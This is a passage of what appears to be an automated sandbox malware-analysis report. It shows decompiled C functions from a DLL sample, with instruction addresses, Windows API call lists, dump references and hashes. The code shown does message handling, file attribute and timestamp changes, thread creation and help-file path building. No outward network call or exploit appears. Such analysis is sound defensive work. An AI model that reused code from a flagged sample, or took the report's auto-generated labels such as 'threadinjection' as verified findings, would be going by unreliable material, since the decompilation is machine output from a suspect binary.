					goto L7;
				} else {
					_t64 =  *((intOrPtr*)( *((intOrPtr*)( *_t88)) + 0x60))(0);
					 *(_t92 + 0x68) = 0;
					goto L25;
				}
			}


























                                                                                                                0x100272ec
                                                                                                                0x100272ee
                                                                                                                0x100272f2
                                                                                                                0x10027493
                                                                                                                0x10027493
                                                                                                                0x10027493
                                                                                                                0x100272f8
                                                                                                                0x100272ff
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10027315
                                                                                                                0x1002731d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10027323
                                                                                                                0x1002732c
                                                                                                                0x1002732f
                                                                                                                0x10027332
                                                                                                                0x1002735b
                                                                                                                0x1002735b
                                                                                                                0x1002735e
                                                                                                                0x1002735f
                                                                                                                0x1002738d
                                                                                                                0x10027393
                                                                                                                0x10027395
                                                                                                                0x10027398
                                                                                                                0x1002739a
                                                                                                                0x1002739a
                                                                                                                0x100273a5
                                                                                                                0x100273a8
                                                                                                                0x100273b7
                                                                                                                0x100273bc
                                                                                                                0x100273c4
                                                                                                                0x100273c7
                                                                                                                0x1002740d
                                                                                                                0x1002740d
                                                                                                                0x10027410
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100273d4
                                                                                                                0x100273da
                                                                                                                0x100273dc
                                                                                                                0x100273f8
                                                                                                                0x100273fa
                                                                                                                0x100273fd
                                                                                                                0x10027400
                                                                                                                0x10027402
                                                                                                                0x10027404
                                                                                                                0x10027407
                                                                                                                0x10027407
                                                                                                                0x00000000
                                                                                                                0x10027402
                                                                                                                0x100273e6
                                                                                                                0x100273e8
                                                                                                                0x100273ed
                                                                                                                0x100273ef
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100273f1
                                                                                                                0x10027418
                                                                                                                0x1002741b
                                                                                                                0x10027427
                                                                                                                0x1002742c
                                                                                                                0x10027440
                                                                                                                0x10027442
                                                                                                                0x10027448
                                                                                                                0x1002744a
                                                                                                                0x1002744f
                                                                                                                0x1002744f
                                                                                                                0x10027452
                                                                                                                0x10027455
                                                                                                                0x10027457
                                                                                                                0x1002745b
                                                                                                                0x10027479
                                                                                                                0x1002745d
                                                                                                                0x1002746b
                                                                                                                0x1002746b
                                                                                                                0x1002745b
                                                                                                                0x10027489
                                                                                                                0x1002748f
                                                                                                                0x00000000
                                                                                                                0x1002748f
                                                                                                                0x1002736e
                                                                                                                0x10027374
                                                                                                                0x00000000
                                                                                                                0x10027374
                                                                                                                0x10027334
                                                                                                                0x1002733a
                                                                                                                0x1002733e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10027342
                                                                                                                0x10027349
                                                                                                                0x00000000
                                                                                                                0x1002734b
                                                                                                                0x10027350
                                                                                                                0x10027353
                                                                                                                0x00000000
                                                                                                                0x10027353

                                                                                                                APIs
                                                                                                                  • Part of subcall function 10026F7E: LoadCursorA.USER32 ref: 10026F9A
                                                                                                                  • Part of subcall function 10026F7E: LoadCursorA.USER32 ref: 10026FB3
                                                                                                                • PeekMessageA.USER32(?,?,00000367,00000367,00000003), ref: 10027315
                                                                                                                • PostMessageA.USER32(?,00000111,0000E145,00000000), ref: 1002736E
                                                                                                                • SendMessageA.USER32 ref: 1002738D
                                                                                                                • GetCursorPos.USER32(?), ref: 100273A8
                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 100273D4
                                                                                                                • ReleaseCapture.USER32 ref: 1002741B
                                                                                                                • SetCapture.USER32(?), ref: 10027420
                                                                                                                • ReleaseCapture.USER32 ref: 1002742C
                                                                                                                • SendMessageA.USER32 ref: 10027440
                                                                                                                • SendMessageA.USER32 ref: 1002746B
                                                                                                                • PostMessageA.USER32(?,0000036A,00000000,00000000), ref: 10027489
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$CaptureCursorSend$LoadPeekPostRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 291007519-0
                                                                                                                • Opcode ID: 58d805fa35646992badd47a243349e5d7ac1a53d3c35ea07d94da2f8a3553d6b
                                                                                                                • Instruction ID: c30bbffdb3fe4ae6972bf7ce15c5940e6a562e61142bcdf2c6550b1aac08a7c5
                                                                                                                • Opcode Fuzzy Hash: 58d805fa35646992badd47a243349e5d7ac1a53d3c35ea07d94da2f8a3553d6b
                                                                                                                • Instruction Fuzzy Hash: AC51AFB1A00609EFEB11EFA1DC84DAEBBB9FF44344F514569F686A62A0D730AD40DF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10039102 Relevance: 18.1, APIs: 12, Instructions: 121filetimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E10039102(CHAR* _a4, signed int* _a8) {
				signed int _v8;
				FILETIME* _v12;
				FILETIME* _v16;
				char _v24;
				char _v32;
				struct _FILETIME _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t40;
				long _t41;
				long _t43;
				signed int* _t47;
				void* _t70;
				void* _t83;
				signed int* _t84;
				void* _t85;

				_t70 = 0;
				_v16 = 0;
				_v12 = 0;
				_t40 = GetFileAttributesA(_a4);
				_t82 = GetLastError;
				_v8 = _t40;
				if(_t40 == 0xffffffff) {
					E10034B40(0, GetLastError, _t83, _t85, GetLastError(), _a4);
				}
				_t84 = _a8;
				_t41 = _t84[8] & 0x000000ff;
				if(_t41 != _v8 && (_v8 & 0x00000001) != 0 && SetFileAttributesA(_a4, _t41) == 0) {
					E10034B40(_t70, _t82, _t84, _t85, GetLastError(), _a4);
				}
				_t42 =  &(_t84[2]);
				if((_t84[2] | _t84[3]) != 0) {
					E10039067(_t70,  &_v40, _t82, _t84, _t42,  &_v40);
					_t47 =  &(_t84[4]);
					_t77 =  *_t47 | _t47[1];
					if(( *_t47 | _t47[1]) != 0) {
						E10039067(_t70,  &_v24, _t82, _t84, _t47,  &_v24);
						_pop(_t77);
						_v12 =  &_v24;
					}
					if(( *_t84 | _t84[1]) != 0) {
						E10039067(_t70, _t77, _t82, _t84, _t84,  &_v32);
						_v16 =  &_v32;
					}
					_t70 = CreateFileA(_a4, 0xc0000000, 1, _t70, 3, 0x80, _t70);
					if(_t70 == 0xffffffff) {
						E10034B40(_t70, _t82, _t84, _t85, GetLastError(), _a4);
					}
					if(SetFileTime(_t70, _v16, _v12,  &_v40) == 0) {
						E10034B40(_t70, _t82, _t84, _t85, GetLastError(), _a4);
					}
					if(CloseHandle(_t70) == 0) {
						E10034B40(_t70, _t82, _t84, _t85, GetLastError(), _a4);
					}
				}
				_t43 = _t84[8] & 0x000000ff;
				if(_t43 == _v8 || (_v8 & 0x00000001) != 0) {
					L21:
					return _t43;
				} else {
					_t43 = SetFileAttributesA(_a4, _t43);
					if(_t43 != 0) {
						goto L21;
					}
					return E10034B40(_t70, _t82, _t84, _t85, GetLastError(), _a4);
				}
			}





















                                                                                                                0x1003910e
                                                                                                                0x10039110
                                                                                                                0x10039113
                                                                                                                0x10039116
                                                                                                                0x1003911f
                                                                                                                0x10039125
                                                                                                                0x10039128
                                                                                                                0x10039130
                                                                                                                0x10039130
                                                                                                                0x10039135
                                                                                                                0x10039138
                                                                                                                0x1003913f
                                                                                                                0x1003915b
                                                                                                                0x1003915b
                                                                                                                0x10039160
                                                                                                                0x10039168
                                                                                                                0x10039173
                                                                                                                0x10039179
                                                                                                                0x1003917f
                                                                                                                0x10039182
                                                                                                                0x10039189
                                                                                                                0x10039192
                                                                                                                0x10039193
                                                                                                                0x10039193
                                                                                                                0x1003919b
                                                                                                                0x100391a2
                                                                                                                0x100391ac
                                                                                                                0x100391ac
                                                                                                                0x100391c8
                                                                                                                0x100391cd
                                                                                                                0x100391d5
                                                                                                                0x100391d5
                                                                                                                0x100391ed
                                                                                                                0x100391f5
                                                                                                                0x100391f5
                                                                                                                0x10039203
                                                                                                                0x1003920b
                                                                                                                0x1003920b
                                                                                                                0x10039203
                                                                                                                0x10039210
                                                                                                                0x10039217
                                                                                                                0x1003923c
                                                                                                                0x1003923c
                                                                                                                0x1003921f
                                                                                                                0x10039223
                                                                                                                0x1003922b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10039233

                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 10039116
                                                                                                                • GetLastError.KERNEL32(?), ref: 1003912D
                                                                                                                • SetFileAttributesA.KERNEL32(?,?), ref: 1003914B
                                                                                                                • GetLastError.KERNEL32(?), ref: 10039158
                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000), ref: 100391C2
                                                                                                                • GetLastError.KERNEL32(?), ref: 100391D2
                                                                                                                • SetFileTime.KERNEL32(00000000,?,?,?), ref: 100391E5
                                                                                                                • GetLastError.KERNEL32(?), ref: 100391F2
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 100391FB
                                                                                                                • GetLastError.KERNEL32(?), ref: 10039208
                                                                                                                • SetFileAttributesA.KERNEL32(?,?), ref: 10039223
                                                                                                                • GetLastError.KERNEL32(?), ref: 10039230
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$File$Attributes$CloseCreateHandleTime
                                                                                                                • String ID:
                                                                                                                • API String ID: 3867745407-0
                                                                                                                • Opcode ID: faeb73b13b030793cdfe3c5e2e502381dc07066af650f089bbbf1ff9eb0d01bc
                                                                                                                • Instruction ID: 7f419f033f1c2a31a84a6146d95747ac909fd2f0a9a0dff047200850bf0561e9
                                                                                                                • Opcode Fuzzy Hash: faeb73b13b030793cdfe3c5e2e502381dc07066af650f089bbbf1ff9eb0d01bc
                                                                                                                • Instruction Fuzzy Hash: 97415B75900249BFDB12DFA1CD89EDEBBFCEF04392F118455F855AA0A1DB34EA40DA20
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001A8AD Relevance: 18.1, APIs: 12, Instructions: 91synchronizationthreadinjectionCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1001A8AD(intOrPtr __ecx, void* __edx, signed char _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				signed int _v24;
				intOrPtr _v28;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t41;
				void* _t55;
				void* _t56;
				intOrPtr _t59;

				_t55 = __edx;
				_t59 = __ecx;
				_t63 =  *((intOrPtr*)(__ecx + 0x2c));
				if( *((intOrPtr*)(__ecx + 0x2c)) != 0) {
					E1000A069(0, __ecx, _t56, __ecx, _t63);
				}
				E10049170(_t56,  &_v32, 0, 0x1c);
				_v32 = E1001DD4F(0, _t56, _t59, _t63);
				_v28 = _t59;
				_v16 = CreateEventA(0, 1, 0, 0);
				_v12 = CreateEventA(0, 1, 0, 0);
				_t35 = _a4;
				_v24 = _a4;
				if(_v16 == 0) {
					L11:
					__eflags = _v12;
					if(_v12 == 0) {
						goto L13;
					}
					goto L12;
				} else {
					if(_v12 == 0) {
						CloseHandle(_v16);
						goto L11;
					}
					_t41 = E1004C95A(_t55, _a12, _a8, E1001A795,  &_v32, _t35 | 0x00000004, _t59 + 0x30);
					 *(_t59 + 0x2c) = _t41;
					if(_t41 == 0) {
						L13:
						return 0;
					}
					ResumeThread(_t41);
					WaitForSingleObject(_v16, 0xffffffff);
					CloseHandle(_v16);
					if((_a4 & 0x00000004) != 0) {
						SuspendThread( *(_t59 + 0x2c));
					}
					if(_v8 == 0) {
						SetEvent(_v12);
						return 1;
					} else {
						WaitForSingleObject( *(_t59 + 0x2c), 0xffffffff);
						CloseHandle( *(_t59 + 0x2c));
						 *(_t59 + 0x2c) = 0;
						L12:
						CloseHandle(_v12);
						goto L13;
					}
				}
			}

















                                                                                                                0x1001a8ad
                                                                                                                0x1001a8b5
                                                                                                                0x1001a8b9
                                                                                                                0x1001a8bd
                                                                                                                0x1001a8bf
                                                                                                                0x1001a8bf
                                                                                                                0x1001a8cb
                                                                                                                0x1001a8e3
                                                                                                                0x1001a8e6
                                                                                                                0x1001a8f0
                                                                                                                0x1001a8fe
                                                                                                                0x1001a901
                                                                                                                0x1001a904
                                                                                                                0x1001a907
                                                                                                                0x1001a987
                                                                                                                0x1001a987
                                                                                                                0x1001a98a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001a909
                                                                                                                0x1001a90c
                                                                                                                0x1001a985
                                                                                                                0x00000000
                                                                                                                0x1001a985
                                                                                                                0x1001a925
                                                                                                                0x1001a92f
                                                                                                                0x1001a932
                                                                                                                0x1001a991
                                                                                                                0x00000000
                                                                                                                0x1001a991
                                                                                                                0x1001a935
                                                                                                                0x1001a940
                                                                                                                0x1001a949
                                                                                                                0x1001a94f
                                                                                                                0x1001a954
                                                                                                                0x1001a954
                                                                                                                0x1001a95d
                                                                                                                0x1001a977
                                                                                                                0x00000000
                                                                                                                0x1001a95f
                                                                                                                0x1001a964
                                                                                                                0x1001a96d
                                                                                                                0x1001a96f
                                                                                                                0x1001a98c
                                                                                                                0x1001a98f
                                                                                                                0x00000000
                                                                                                                0x1001a98f
                                                                                                                0x1001a95d

                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 1001A8CB
                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1001A8E9
                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1001A8F3
                                                                                                                • ResumeThread.KERNEL32(00000000), ref: 1001A935
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1001A940
                                                                                                                • CloseHandle.KERNEL32(?), ref: 1001A949
                                                                                                                • SuspendThread.KERNEL32(?), ref: 1001A954
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1001A964
                                                                                                                • CloseHandle.KERNEL32(?), ref: 1001A96D
                                                                                                                • CloseHandle.KERNEL32(?), ref: 1001A98F
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                • SetEvent.KERNEL32(00000004), ref: 1001A977
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseEventHandle$CreateObjectSingleThreadWait$Exception@8H_prolog3ResumeSuspendThrow_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3256170895-0
                                                                                                                • Opcode ID: 9049e03c2b06ccf8a3b8e1e327f9b879ebdf1785fe53997139be18a3708e4347
                                                                                                                • Instruction ID: 1bca54e72f4ae1e8fd6b423ebf6d5296896c1588f7da4133b7cdabd0e7a60bac
                                                                                                                • Opcode Fuzzy Hash: 9049e03c2b06ccf8a3b8e1e327f9b879ebdf1785fe53997139be18a3708e4347
                                                                                                                • Instruction Fuzzy Hash: 5E315A72C00209BFDB01AFE5CC849AEBBF9FF06394B21866AF116A5060D77499D18F60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10034554 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 122COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 62%
                                                                                                                			E10034554(void* __ecx, void* __edx, void* __eflags, char _a132, char _a392, signed int _a652, char _a656) {
				char _v124;
				char* _v128;
				char _v660;
				char _v804;
				char _v812;
				char _v820;
				intOrPtr _v832;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t44;
				char* _t53;
				char* _t57;
				void* _t59;
				intOrPtr _t73;
				void* _t76;
				char* _t79;
				char* _t81;
				char* _t84;
				void* _t87;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t99;
				void* _t100;
				signed int _t102;
				void* _t105;
				void* _t106;
				void* _t108;
				void* _t109;

				_t94 = __edx;
				_t90 = __ecx;
				_t102 =  &_v660;
				_t109 = _t108 - 0x310;
				_t44 =  *0x100b9e70; // 0xbb35530
				_a652 = _t44 ^ _t102;
				_push(_t87);
				_push(_t95);
				_t99 = __ecx;
				_t96 = E1001E302(_t87, _t95, __ecx, __eflags);
				 *(_t96 + 8) =  *(_t99 + 0x44);
				 *(_t96 + 0xc) =  *(_t99 + 0x44);
				if(GetModuleFileNameA( *(_t99 + 0x44),  &_a392, 0x104) == 0) {
					L7:
					E1000C2FB(_t90);
				} else {
					__eflags = __eax - 0x104;
					if(__eax == 0x104) {
						goto L7;
					}
				}
				_t53 = PathFindExtensionA( &_a392);
				__eflags = _t53;
				_v128 = _t53;
				if(_t53 == 0) {
					E1000C2FB(_t90);
				}
				 *_v128 = 0;
				_t57 = E10034516( &_a392,  &_a132, 0x104);
				__eflags = _t57;
				if(_t57 != 0) {
					E1000C2FB(_t90);
				}
				__eflags =  *(_t99 + 0x60);
				if( *(_t99 + 0x60) != 0) {
					L15:
					_t58 =  *(_t99 + 0x50);
					__eflags = _t58;
					if(_t58 != 0) {
						L20:
						 *(_t96 + 0x10) = _t58;
						__eflags =  *(_t99 + 0x64);
						if( *(_t99 + 0x64) != 0) {
							L26:
							__eflags =  *(_t99 + 0x68);
							if( *(_t99 + 0x68) != 0) {
								L28:
								_pop(_t97);
								_pop(_t100);
								_pop(_t89);
								_t59 = E1004763E(_t58, _t89, _a652 ^ _t102, _t94, _t97, _t100);
								__eflags =  &_a656;
								return _t59;
							} else {
								_push(E1004D00F(_t94,  &_a132, 0x104, ".INI"));
								L1000135C(0x104, _t90, _t96, _t99);
								_t58 = E1004C810( &_a132);
								_t109 = _t109 + 0x14;
								__eflags = _t58;
								 *(_t99 + 0x68) = _t58;
								if(_t58 == 0) {
									goto L14;
								} else {
									goto L28;
								}
							}
						} else {
							_t76 =  &_a652 - _v128;
							__eflags =  *((intOrPtr*)(_t99 + 0x6c)) - 1;
							if( *((intOrPtr*)(_t99 + 0x6c)) != 1) {
								_push(".HLP");
							} else {
								_push(".CHM");
							}
							_push(_t76);
							_push(_v128);
							E10019530(0x104, _t94, _t96, _t99, _t102);
							_t109 = _t109 + 0xc;
							_t79 = E1004C810( &_a392);
							__eflags = _t79;
							_pop(_t90);
							 *(_t99 + 0x64) = _t79;
							if(_t79 == 0) {
								goto L14;
							} else {
								_t58 = _v128;
								 *_v128 = 0;
								goto L26;
							}
						}
					} else {
						_t81 = E1001FA58(0x104, _t90, _t96, _t99, _t102, 0xe000,  &_v124, 0x100);
						__eflags = _t81;
						if(_t81 == 0) {
							_push( *(_t99 + 0x60));
						} else {
							_push( &_v124);
						}
						_t58 = E1004C810();
						__eflags = _t58;
						 *(_t99 + 0x50) = _t58;
						_pop(_t90);
						if(_t58 == 0) {
							goto L14;
						} else {
							goto L20;
						}
					}
				} else {
					_t84 = E1004C810( &_a132);
					__eflags = _t84;
					_pop(_t90);
					 *(_t99 + 0x60) = _t84;
					if(_t84 != 0) {
						goto L15;
					} else {
						L14:
						_push(_t102);
						_t105 = _t109;
						_push(_t90);
						_v804 = 0x100b84e8;
						L10048E48( &_v804, 0x100afe38);
						asm("int3");
						_push(_t105);
						_t106 = _t109;
						_push(_t90);
						_v812 = 0x100b8580;
						L10048E48( &_v812, 0x100afeec);
						asm("int3");
						_push(_t106);
						_push(_t90);
						_v820 = 0x100b8618;
						L10048E48( &_v820, 0x100aff30);
						asm("int3");
						_push(4);
						E1004764D(0x1008dd26, 0x104, _t96, _t99);
						_t93 = E10020454(0x104);
						_v832 = _t93;
						_t73 = 0;
						_v820 = 0;
						if(_t93 != 0) {
							_t73 = E1001DB72(_t93);
						}
						return E10047725(_t73);
					}
				}
			}






































                                                                                                                0x10034554
                                                                                                                0x10034554
                                                                                                                0x10034555
                                                                                                                0x1003455c
                                                                                                                0x10034562
                                                                                                                0x10034569
                                                                                                                0x1003456f
                                                                                                                0x10034571
                                                                                                                0x10034572
                                                                                                                0x10034579
                                                                                                                0x1003457e
                                                                                                                0x10034584
                                                                                                                0x1003459f
                                                                                                                0x100345a5
                                                                                                                0x100345a5
                                                                                                                0x100345a1
                                                                                                                0x100345a1
                                                                                                                0x100345a3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100345a3
                                                                                                                0x100345b1
                                                                                                                0x100345b7
                                                                                                                0x100345b9
                                                                                                                0x100345bc
                                                                                                                0x100345be
                                                                                                                0x100345be
                                                                                                                0x100345c6
                                                                                                                0x100345d8
                                                                                                                0x100345dd
                                                                                                                0x100345df
                                                                                                                0x100345e1
                                                                                                                0x100345e1
                                                                                                                0x100345e6
                                                                                                                0x100345ea
                                                                                                                0x10034605
                                                                                                                0x10034605
                                                                                                                0x10034608
                                                                                                                0x1003460a
                                                                                                                0x10034639
                                                                                                                0x10034639
                                                                                                                0x1003463c
                                                                                                                0x10034640
                                                                                                                0x10034683
                                                                                                                0x10034683
                                                                                                                0x10034687
                                                                                                                0x100346bb
                                                                                                                0x100346c1
                                                                                                                0x100346c2
                                                                                                                0x100346c5
                                                                                                                0x100346c6
                                                                                                                0x100346cb
                                                                                                                0x100346d2
                                                                                                                0x10034689
                                                                                                                0x1003469b
                                                                                                                0x1003469c
                                                                                                                0x100346a8
                                                                                                                0x100346ad
                                                                                                                0x100346b0
                                                                                                                0x100346b2
                                                                                                                0x100346b5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100346b5
                                                                                                                0x10034642
                                                                                                                0x10034648
                                                                                                                0x1003464b
                                                                                                                0x1003464f
                                                                                                                0x10034658
                                                                                                                0x10034651
                                                                                                                0x10034651
                                                                                                                0x10034651
                                                                                                                0x1003465d
                                                                                                                0x1003465e
                                                                                                                0x10034661
                                                                                                                0x1003466c
                                                                                                                0x10034670
                                                                                                                0x10034675
                                                                                                                0x10034677
                                                                                                                0x10034678
                                                                                                                0x1003467b
                                                                                                                0x00000000
                                                                                                                0x1003467d
                                                                                                                0x1003467d
                                                                                                                0x10034680
                                                                                                                0x00000000
                                                                                                                0x10034680
                                                                                                                0x1003467b
                                                                                                                0x1003460c
                                                                                                                0x1003461a
                                                                                                                0x1003461f
                                                                                                                0x10034621
                                                                                                                0x10034629
                                                                                                                0x10034623
                                                                                                                0x10034626
                                                                                                                0x10034626
                                                                                                                0x1003462c
                                                                                                                0x10034631
                                                                                                                0x10034633
                                                                                                                0x10034636
                                                                                                                0x10034637
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10034637
                                                                                                                0x100345ec
                                                                                                                0x100345f3
                                                                                                                0x100345f8
                                                                                                                0x100345fa
                                                                                                                0x100345fb
                                                                                                                0x100345fe
                                                                                                                0x00000000
                                                                                                                0x10034600
                                                                                                                0x10034600
                                                                                                                0x1000a035
                                                                                                                0x1000a036
                                                                                                                0x1000a038
                                                                                                                0x1000a042
                                                                                                                0x1000a049
                                                                                                                0x1000a04e
                                                                                                                0x1000a04f
                                                                                                                0x1000a050
                                                                                                                0x1000a052
                                                                                                                0x1000a05c
                                                                                                                0x1000a063
                                                                                                                0x1000a068
                                                                                                                0x1000a069
                                                                                                                0x1000a06c
                                                                                                                0x1000a076
                                                                                                                0x1000a07d
                                                                                                                0x1000a082
                                                                                                                0x1000a083
                                                                                                                0x1000a08a
                                                                                                                0x1000a099
                                                                                                                0x1000a09b
                                                                                                                0x1000a09e
                                                                                                                0x1000a0a2
                                                                                                                0x1000a0a5
                                                                                                                0x1000a0a7
                                                                                                                0x1000a0a7
                                                                                                                0x1000a0b1
                                                                                                                0x1000a0b1
                                                                                                                0x100345fe

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __strdup$ExtensionFileFindModuleNamePath_strcat_s
                                                                                                                • String ID: .CHM$.HLP$.INI
                                                                                                                • API String ID: 1153805871-4017452060
